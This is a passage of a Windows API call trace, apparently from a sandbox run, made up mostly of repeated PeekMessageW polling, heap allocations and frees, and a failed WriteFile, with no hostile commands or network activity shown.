wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.325] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.326] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.327] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892e0 [0026.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0026.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="00000000000000000000010000000000\r\n", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0026.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x23) returned 0x7ac2c0 [0026.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="00000000000000000000010000000000\r\n", cchWideChar=35, lpMultiByteStr=0x7ac2c0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00000000000000000000010000000000\r\n", lpUsedDefaultChar=0x0) returned 35 [0026.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1000) returned 0x7b6ac0 [0026.340] GetLastError () returned 0x3f0 [0026.340] SetLastError (dwErrCode=0x3f0) [0026.340] GetLastError () returned 0x3f0 [0026.340] SetLastError (dwErrCode=0x3f0) [0026.340] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.340] GetLastError () returned 0x6 [0026.340] GetLastError () returned 0x6 [0026.340] SetLastError (dwErrCode=0x6) [0026.340] GetLastError () returned 0x6 [0026.340] SetLastError (dwErrCode=0x6) [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac670 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0026.340] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af278 [0026.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae788 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae788 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.340] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.341] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af278 [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6af340 | out: lpPerformanceCount=0x6af340*=16826316933) returned 1 [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.341] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b58 [0026.341] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b58 | out: hHeap=0x770000) returned 1 [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b58 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af278 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b30 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af288 [0026.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8892e0 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bd0 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889238 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889328 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab1d0 [0026.341] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bf8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893d0 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2c8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893e8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c48 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889418 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2b8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2e8 [0026.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894a8 | out: hHeap=0x770000) returned 1 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0026.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2e8 | out: hHeap=0x770000) returned 1 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c20 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2e8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889df0 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d78 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ba8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d90 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2f8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889da8 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b80 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d48 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af518 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d60 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ce8 [0026.342] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.342] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d78 | out: hHeap=0x770000) returned 1 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d78 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d78 | out: hHeap=0x770000) returned 1 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed228 [0026.343] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d78 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d00 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 